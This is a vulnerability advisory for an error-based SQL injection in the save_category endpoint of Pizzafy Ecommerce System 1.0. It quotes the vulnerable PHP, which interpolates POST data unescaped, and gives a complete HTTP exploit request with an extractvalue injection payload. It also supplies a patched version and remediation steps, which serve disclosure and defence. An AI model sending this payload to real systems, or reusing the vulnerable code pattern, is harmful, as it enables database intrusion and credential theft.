# Vulnerability Summary: Pizzafy Ecommerce System 1.0 SQL Injection Vulnerability

## Vulnerability Overview

- **Affected Version**: Pizzafy Ecommerce System 1.0
- **Vulnerability Type**: SQL Injection (Error-based SQL Injection)
- **Severity**: HIGH
- **Status**: Unpatched
- **Vulnerable Endpoint**: `pizzafy/admin/ajax.php?action=save_category`
- **Vulnerability Description**:
  - An error-based SQL injection vulnerability was identified in the `save_category` functionality.
  - The root cause is that the `name` POST parameter is interpolated directly into the `name = '...'` assignment of the `INSERT`/`UPDATE` statement without sanitization or parameter binding, allowing attackers to inject SQL into backend database queries. Because the function returns the raw `$this->conn->error` text to the client, database error messages are also exposed, which is what makes the error-based technique work.

## Impact Scope

- **Confidentiality**: Full exposure of database schema and user credentials
- **Integrity**: Unauthorized deletion or modification of records
- **Availability**: Service disruption due to large-scale data deletion
- **Privilege Escalation**: Session hijacking and administrative access

## Remediation

1. **Use Prepared Statements**: Implement parameterized queries to prevent SQL injection.
2. **Input Validation**: Validate and sanitize the `name` parameter, allowing only expected values.
3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection attacks.
4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as unusual queries or repeated attempts.
5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities.
6. **Error Handling**: Avoid exposing database-related errors in responses, as this information can assist attackers.

## Vulnerable Code

```php
function save_category(){
    extract($_POST);                 // every POST field becomes a local variable, including $name and $id
    $data = " name = '$name' ";      // $name is interpolated into the SQL string unescaped
    if(empty($id)){
        $save = $this->conn->query("INSERT INTO category_list set ".$data);
    }else{
        $save = $this->conn->query("UPDATE category_list set ".$data." where id='".$id."'");
    }
    if($save){
        return 1;
    } else {
        return $this->conn->error;   // raw MySQL error text is returned to the client
    }
}
```

## Exploit Code

```http
POST /pizzafy/admin/ajax.php?action=save_category HTTP/1.1
Host: localhost
Content-Length: 286
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd8Yid37qqPcyPw2H
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/admin/index.php?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: __SMSG_logged=2; __SMSG_key=286b8e5962b2c723e9bfba4bceec7a8aec379ceee87f8d85d6cb304df687ec; PM
Connection: close

------WebKitFormBoundaryd8Yid37qqPcyPw2H
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryd8Yid37qqPcyPw2H
Content-Disposition: form-data; name="name"

name: test10' OR extractvalue(1, concat(0x7e, version())) -- 
------WebKitFormBoundaryd8Yid37qqPcyPw2H--
```

## Patched Code

```php
function save_category(){
    // Read only the two expected fields; cast the id to an integer instead of trusting the raw string.
    $id   = isset($_POST['id']) ? (int)$_POST['id'] : 0;
    $name = isset($_POST['name']) ? trim($_POST['name']) : '';
    if(empty($name)){
        return "Name is necessary.";
    }
    // Bind user data as parameters so it can never change the structure of the statement.
    if(empty($id)){
        $stmt = $this->conn->prepare("INSERT INTO category_list (name) VALUES (?)");
        $stmt->bind_param("s", $name);
    } else {
        $stmt = $this->conn->prepare("UPDATE category_list SET name = ? WHERE id = ?");
        $stmt->bind_param("si", $name, $id);
    }
    if($stmt->execute()){
        return 1;
    } else {
        // Log the database error server-side; return only a generic failure code to the client.
        error_log("Error saving category: " . $stmt->error);
        return 0;
    }
}
```